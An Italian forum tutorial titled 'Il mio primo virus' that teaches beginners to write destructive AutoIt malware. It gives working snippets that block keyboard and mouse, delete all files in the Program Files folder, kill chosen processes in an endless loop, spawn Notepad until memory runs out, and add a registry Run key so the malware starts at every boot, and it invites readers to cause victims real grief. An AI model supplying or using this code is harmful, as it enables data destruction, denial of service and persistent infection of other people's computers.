IL MIO PRIMO VIRUS
Se avete letto il tutorial di DarkJoker conoscete abbastanza approssimativamente il linguaggio
di programmazione Autoit.
Dovete sapere che questo è utilissimo anche per creare dei virus più o meno potenti.
Quello che dobbiamo fare è semplicemente usare delle funzioni del linguaggio che possono
danneggiare il computer se usate in un certo modo,
Iniziamo da una funzione semplicissima: BlockInput
[code ]BlockInput(1)[/code]
BlockInput blocca l'input di tastiera e mouse in modo da non permettere più all'utente di fare
nulla.
Purtroppo questa funzione ha un grosso bug, e appena l'utente preme la combinazione di tasti
CTRL-ALT-CANC(come fa la maggior parte delle persone quando c'è un problema) e quindi è
pressochè inutile, ma serve a rendere l'idea di cosa si può fare con questa linguaggio.
Vediamo ora le funzioni migliori per creare virus..
Cominciamo con quelle che gestiscono i file:
- Codice:
-
FileOpen(apre un file di lettura)
FileCopy(copia un file)
FileMove(sposta un file)
FileDelete(cancella un file)
Quella che ci serve è FileDelete, perchè permette appunto di cancellare dei dati da un
computer
- Codice:
-
FileDelete("C:\Programmi\*.*")
Questo semplice virus cancella tutti i file nella cartella "Programmi" del computer.(* indica tutti i tipi esistenti quindi * = tutti i nomi . * = tutti i formati.
esiste anche il comando dirdelete che cancella direttamente tutta la cartella:
- Codice:
-
Dirdelete ("C:\Programmai")
Attraverso questa funzione potrete creare virus che cancellano file importanti dai
computer(ricordate comunque che i file veramente importanti, come quelli di sistema, non si
possono cancellare, ma potete comunque creare un dispiacere notevole in chi apre questo tipo di virus)
Altre funzioni utilissime sono quelle che controllano i processi:
- Codice:
-
ProcessExists(controlla l'esistenza di un processo)
ProcessClose(chide il processo)
Se avete letto il tutorial di darkjoker su autoit conoscete già l'utilizzo di cicli while e condizioni if,
che abbinati a queste funzioni possono bloccare completamente programmi)
- Codice:
-
While 1 = 1
If ProcessExists("notepad.exe") Then
ProcessClose("notepad.exe")
EndIf
Wend
ovvero
- Codice:
-
Finchè 1= 1(sempre)
Se esiste il processo "notepad.exe" Allora
Chiudilo
Fine della condizione if
Fine del ciclo while
In questo modo potrete dire addio al blocco note di windows finchè questo virus è in
esecuzione. e se al posto di "notepad" mettete il nome del processo dell'applicazione che volete bloccare( il nome si può vedere tramite il task manager, click col tasto destro sul
programma, "Vai al processo) avete bloccato il programma.
Potete anche bloccare il computer dicendogli di fare troppe cose in una volta, per esempio di
aprire all'infinito il blocco note:
- Codice:
-
While 1 = 1
Run("notepad.exe")
WEnd
La funzione Run unita con il while fa aprire all'infinito il blocco note di windows, finchè il
computer finisce la RAM e va completamente in panne...
Ora la funzione più importante di tutte è il RegWrite, che permette di scrivere nel registro di
sistema. In questo modo possiamo dire a windows che ogni volta che si accende il computer
deve aprire il virus. così non ci sarà più niente da fare per chi è colpito dal virus!!!!
- Codice:
-
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "dkcd", "REG_SZ", "C:\djcd.exe")
Questo semplice programma dice al computer che ogni volta che si accendere di aprire il virus
chiamato "djcd.exe", salvato nella cartella C:\del computer.
Così potrte installare un virus in un computer semplicemente creandolo, salvandolo in una
cartella del computer e poi creare un'altro programma come questo che dice al computer di
aprire il virus ad ogni avvio. La voce che dovrete cambiare è l'ultima, quella del percorso,( a meno che non chiamiate il virus proprio djcd e lo salviate nel percorso C:\ )
Se comunque non avete capito bene quest'ultima parte potrete chiedere maggiori informazioni sul forum.....
Mi raccomando, usate queste informazioni senza arrecare danno ai computer!!!
CertainDeath
xhacking@yahoo.it
Indice 
